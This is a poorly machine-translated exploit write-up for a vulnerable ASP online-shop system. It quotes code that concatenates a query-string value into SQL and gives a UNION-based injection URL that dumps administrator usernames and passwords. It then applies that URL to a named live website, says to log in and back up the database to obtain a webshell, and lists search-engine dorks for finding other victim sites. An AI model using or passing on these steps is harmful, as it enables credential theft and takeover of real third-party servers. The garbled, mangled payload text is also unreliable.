Author: flaw0r
Version: v1.1a Bulid 20090413 Access Free
Vulnerability 1: dingdan. asp Injection Vulnerability
Vulnerability level: severe
Problem code:
Dingdan = request. QueryString ("dan ")
Set rs = server. CreateObject ("adodb. recordset ")
Rs. open "select BJX_goods.bookid, BJX_goods.shjiaid, BJX_goods.bookname, BJX_goods.shichangjia, BJX_goods.huiyuanjia,
Bjx_action.actiondate, bjx_action.shousex, bjx_action.danjia, bjx_action.feiyong, bjx_action.fapiao,
Bjx_action.userzhenshiname, bjx_action.shouhuoname, bjx_action.dingdan, bjx_action.youbian,
Bjx_action.liuyan, bjx_action.zhifufangshi, bjx_action.songhuofangshi, bjx_action.zhuangtai,
Bjx_action.zonger, bjx_action.useremail, bjx_action.usertel, bjx_action.shouhuodizhi,
Bjx_action.bookcount, bjx_action.star,
Bjx_action.pingjia from BJX_goods inner join bjx_action on BJX_goods.bookid = bjx_action.bookid where bjx_action.username = "& request. cookies ("bjx") ("username") & "and dingdan =" & dingdan & "", conn, 1, 1
Inject test code:
Http: // 192.168.1.3/yhshop/dingdan. asp? Dan = 2009422172358% 20and % 201 = 2% 20 union % 20 select % ,,2, admin, 22, password, 24,25% 20 from
% 20BJX_admin % 20 where % 201 = 1
In fact, this system is really speechless. It is similar to the BOBO online store system I analyzed earlier, so the vulnerability is similar to that of BOBO. Here I only provide one injection vulnerability, I really don't know what people think now. Can I make money with other people's programs? Despise people who steal others' source code and sell money! (This is not to say that the program was copied by the author, and I took it for free. I despise BOBO first)
The back-end has the backup function, so SHELL is relatively simple.
Network practice:
Search by Baidu: Yi and Sunshine Shopping Mall
Target selected: http://eshop.iheeo.com/
First, register a user, select the next order of a product, and then check and change the order in the member center.
Submit our test statement:
Http://eshop.iheeo.com/dingdan.asp? Dan = 2009423113536% 20and % 201 = 2% 20 union % 20 select % ,,2, admin, 22, password, 24,25% 20 from % 20BJX_admin % 20 where % 201 = 1
The username and password of all administrators can be displayed.
Log on to the background with the administrator password. You can back up the database to obtain WEBSHELL.
Tip: google Search: inurl: product. asp? Iheeoid = You can find some websites that use this system!